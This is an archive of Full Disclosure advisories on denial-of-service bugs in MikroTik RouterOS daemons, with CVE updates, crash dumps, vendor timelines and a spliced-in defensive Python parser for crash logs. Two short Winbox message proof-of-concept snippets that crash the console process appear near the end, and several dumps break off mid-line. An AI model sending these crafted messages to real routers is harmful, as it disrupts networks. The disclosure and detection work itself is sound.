Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C
[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/resolver process. An
authenticated remote attacker can cause a Denial of Service due to invalid
memory access.

CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /nova/bin/user process. An
authenticated remote attacker can cause a Denial of Service due to an
assertion failure via a crafted packet.


On Wed, Sep 9, 2020 at 9:02 PM, Q C wrote:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> =======
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ===================
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==============================
>
> 1. memory corruption
> The resolver process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> resolver process due to invalid memory access.
>
> Against stable 6.46.5, the PoC resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.28@0: /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: --- signal=11
> 
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
> 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018
> ebp=0x7fe5fd08 esp=0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98
> ecx=0x77676f00 edx=0x0005
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: maps:
> 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
>  /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc
> e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
> 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c
> 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: code: 0x80508f6
> 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72
> 04 8b
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The user process suffers from an assertion failure vulnerability. There is
> a reachable assertion in the user process. By sending a crafted packet, an
> authenticated remote user can crash the user process due to assertion
> failure.
>
> Against stable 6.46.5, the PoC resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: /nova/bin/user
> 2020.06.04-17:56:52.31@0: --- signal=6
> 
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
> 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200
> ebp=0x7fee3790 esp=0x7fee3788
> 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4
> ecx=0x00b4 edx=0x0006
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: maps:
> 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
>   /nova/bin/user
> 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp  00:0c 947
>  /lib/libucrypto.so
> 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp  00:0c 951
>  /lib/liburadius.so
> 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp  00
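
The backtrace.log entries quoted above are what a defender actually has to work with when these crashes show up on a device. As an added example (not part of the advisory and not RouterOS code), the Python below parses that format and reports which process died, with which signal, and which mapped object eip fell in: that is what separates a SIGSEGV inside the daemon's own code (the resolver dump) from a SIGABRT raised out of libc by a failed assertion (the user dump). The sample dumps are constructed from the values quoted above, with the wrapped map lines re-joined.

```python
import re

# Constructed samples modelled on the /rw/logs/backtrace.log entries quoted in the
# advisory (values from the resolver and user dumps; wrapped map lines re-joined).
RESOLVER_DUMP = """\
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995 /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b
"""
USER_DUMP = """\
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002 /nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964 /lib/libuClibc-0.9.33.2.so
"""

LINE_RE = re.compile(r"^\s*(\S+)@\d+:[ \t]?(.*)$", re.M)  # "<timestamp>@<cpu>: <body>"
MAP_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+\S+\s+\S+\s+\d+\s+(\S+)$")
REG_RE = re.compile(r"\b(eflags|e[a-z]{2})=0x([0-9a-f]+)")
SIGNALS = {6: "SIGABRT (abort/assertion failure)", 11: "SIGSEGV (invalid memory access)"}

def parse_backtrace(text):
    """Return {timestamp, process, signal, regs, maps} for one backtrace.log entry."""
    crash = {"timestamp": None, "process": None, "signal": None, "regs": {}, "maps": []}
    for m in LINE_RE.finditer(text):
        crash["timestamp"] = crash["timestamp"] or m.group(1)
        body = m.group(2).strip()
        if body.startswith("--- signal="):
            crash["signal"] = int(body.split("=", 1)[1])
        elif body.startswith("/"):  # the crashed executable
            crash["process"] = body
        elif (mm := MAP_RE.match(body)):  # "start-end perms dev inode path"
            crash["maps"].append((int(mm.group(1), 16), int(mm.group(2), 16), mm.group(3)))
        else:  # register lines; "maps:" and raw hex lines match nothing and are skipped
            crash["regs"].update((k, int(v, 16)) for k, v in REG_RE.findall(body))
    return crash

def module_at(crash, addr):
    """Name the mapped object whose range contains addr, or None if unmapped."""
    return next((p for s, e, p in crash["maps"] if s <= addr < e), None)

def triage(text):
    """One-line summary: process, signal, and the module eip was executing in."""
    crash = parse_backtrace(text)
    eip = crash["regs"].get("eip")
    where = f" at eip=0x{eip:08x} in {module_at(crash, eip)}" if eip is not None else ""
    sig = SIGNALS.get(crash["signal"], f"signal {crash['signal']}")
    return f"{crash['process']} died with {sig}{where}"
```

Run over a real /rw/logs/backtrace.log, repeated crashes of the same /nova/bin process with the same signal are a usable indicator that a device on an unpatched release is being hit with one of the crafted packets described here.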

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/igmp-proxy process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec
process. An authenticated remote attacker can cause a Denial of Service due
to an assertion failure via a crafted packet.



On Thu, Aug 13, 2020 at 7:14 PM, Q C wrote:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> =======
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ===================
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==============================
>
> 1. NULL pointer dereference
> The igmpproxy process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> igmpproxy process due to NULL pointer dereference.
>
> Against stable 6.46.5, the PoC resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: --- signal=11
> 
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
> 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8
> ebp=0x7fa932a8 esp=0x7fa9326c
> 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x
> ecx=0x000b edx=0x
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: maps:
> 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
>   /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
> 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32
> a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
> 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32
> a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: code: 0x8050a8d
> 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4
> 0c 0f
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The ipsec process suffers from an assertion failure vulnerability. There
> is a reachable assertion in the ipsec process. By sending a crafted packet,
> an authenticated remote user can crash the ipsec process due to assertion
> failure.
>
> Against stable 6.46.5, the PoC resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: --- signal=6
> 
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
> 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200
> ebp=0x7f8fa450 esp=0x7f8fa448
> 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291
> ecx=0x0291 edx=0x0006
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: maps:
> 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
>   /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp  00:0c 959
>  /lib/libdl-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp  00:1f 15
>   /ram/pckg/dhcp/lib/libudhcp.so
> 2020.06.04-18:25:16.04@0: 774d2

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers
from an uncontrolled resource consumption vulnerability in the
/nova/bin/cerm process. An authenticated remote attacker can cause a Denial
of Service by overloading the system's CPU.

CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/traceroute process. An
authenticated remote attacker can cause a Denial of Service via the
loop counter variable.



On Sun, May 10, 2020 at 10:41 AM, Q C wrote:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> =======
>
> Product: MikroTik's RouterOS
> Affected Versions: until stable 6.45.7 (first vulnerability), until stable
> 6.46.4 (second vulnerability)
> Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
> vulnerability)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ===================
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==============================
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found. Maybe other release trees also suffer from
> these vulnerabilities.
>
> 1. The cerm process suffers from an uncontrolled resource consumption
> issue. By sending a crafted packet, an authenticated remote user can cause
> a high CPU load, which may make the device respond slowly or become unable
> to respond.
>
> 2. The traceroute process suffers from a memory corruption issue. By
> sending a crafted packet, an authenticated remote user can crash the
> traceroute process due to invalid memory access.
>
>
> Solution
> ========
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==========
>
> [1] https://mikrotik.com/download/changelogs/stable-release-tree
>
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been
assigned to these two vulnerabilities.


CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
a memory corruption vulnerability in the /nova/bin/console process. An
authenticated remote attacker can cause a Denial of Service (NULL
pointer dereference).


CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
an assertion failure vulnerability in the /nova/bin/console process.
An authenticated remote attacker can cause a Denial of Service due to
an assertion failure via a crafted packet.





On Tue, Apr 14, 2020 at 6:29 PM, Q C wrote:

> [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
> from these two vulnerabilities.
>
> Details
> =======
>
> Product: MikroTik's RouterOS
> Affected Versions: through 6.46.5 (stable release tree)
> Fixed Versions: -
> Vendor URL: https://mikrotik.com/
> Vendor Status: not fixed yet
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
> PoC
> ===
> The following PoCs are based on the routeros tool
> (https://github.com/tenable/routeros).
>
> 1) memory corruption in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe000c, -1);
> msg.add_u32(9, 9);
>
> 2) assertion failure in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe0001, 0);
>
> Disclosure timeline
> ===================
> 2019/08/23  reported the 2nd issue to the vendor
> 2019/08/26  reported the 1st issue to the vendor
> 2019/08/28  vendor reproduced the 1st issue and will fix it as soon as
>             possible
> 2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as
>             possible
> 2019/12/02  notified the vendor the 1st issue still exists in version
>             6.44.6 (2nd issue fixed)
> 2020/01/06  no response from the vendor, and did the initial disclosure
> 2020/04/14  re-tested these two issues against the stable 6.46.5, and
>             updated the disclosure
>
>
>
> On Mon, Jan 6, 2020 at 7:32 PM, Q C wrote:
>
>> Advisory: two vulnerabilities found in MikroTik's RouterOS
>>
>>
>> Details
>> =======
>>
>> Product: MikroTik's RouterOS
>> Affected Versions: before 6.44.6 (Long-term release tree)
>> Fixed Versions: 6.44.6 (Long-term release tree)
>> Vendor URL: https://mikrotik.com/
>> Vendor Status: fixed version released
>> CVE: -
>> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>>
>>
>> Product Description
>> ===================
>>
>> RouterOS is the operating system used on MikroTik's devices, such as
>> switches, routers and access points.
>>
>>
>> Description of vulnerabilities
>> ==============================
>>
>> These two vulnerabilities were tested only against the MikroTik RouterOS
>> long-term release tree when found. Maybe other release trees also suffer
>> from these issues.
>>
>> 1. The console process suffers from a memory corruption issue.
>> An authenticated remote user can crash the console process due to a NULL
>> pointer dereference by sending a crafted packet.
>>
>> 2. The console process suffers from an assertion failure issue. There is
>> a reachable assertion in the console process. An authenticated remote user
>> can crash the console process due to assertion failure by sending a crafted
>> packet.
>>
>> Solution
>> ========
>>
>> Upgrade to the corresponding latest RouterOS tree version.
>>
>>
>> References
>> ==========
>>
>> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>>
>


Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2020-04-14 Thread Q C
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
from these two vulnerabilities.

Details
=======

Product: MikroTik's RouterOS
Affected Versions: through 6.46.5 (stable release tree)
Fixed Versions: -
Vendor URL: https://mikrotik.com/
Vendor Status: not fixed yet
CVE: -
Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team

PoC
===
The following PoCs are based on the routeros tool
(https://github.com/tenable/routeros).

1) memory corruption in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe000c, -1);
msg.add_u32(9, 9);

2) assertion failure in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe0001, 0);

Disclosure timeline
===================
2019/08/23  reported the 2nd issue to the vendor
2019/08/26  reported the 1st issue to the vendor
2019/08/28  vendor reproduced the 1st issue and will fix it as soon as
            possible
2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as
            possible
2019/12/02  notified the vendor the 1st issue still exists in version
            6.44.6 (2nd issue fixed)
2020/01/06  no response from the vendor, and did the initial disclosure
2020/04/14  re-tested these two issues against the stable 6.46.5, and
            updated the disclosure



On Mon, Jan 6, 2020 at 7:32 PM, Q C wrote:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> =======
>
> Product: MikroTik's RouterOS
> Affected Versions: before 6.44.6 (Long-term release tree)
> Fixed Versions: 6.44.6 (Long-term release tree)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen (@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ===================
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==============================
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> long-term release tree when found. Maybe other release trees also suffer
> from these issues.
>
> 1. The console process suffers from a memory corruption issue.
> An authenticated remote user can crash the console process due to a NULL
> pointer dereference by sending a crafted packet.
>
> 2. The console process suffers from an assertion failure issue. There is a
> reachable assertion in the console process. An authenticated remote user
> can crash the console process due to assertion failure by sending a crafted
> packet.
>
> Solution
> ========
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==========
>
> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>
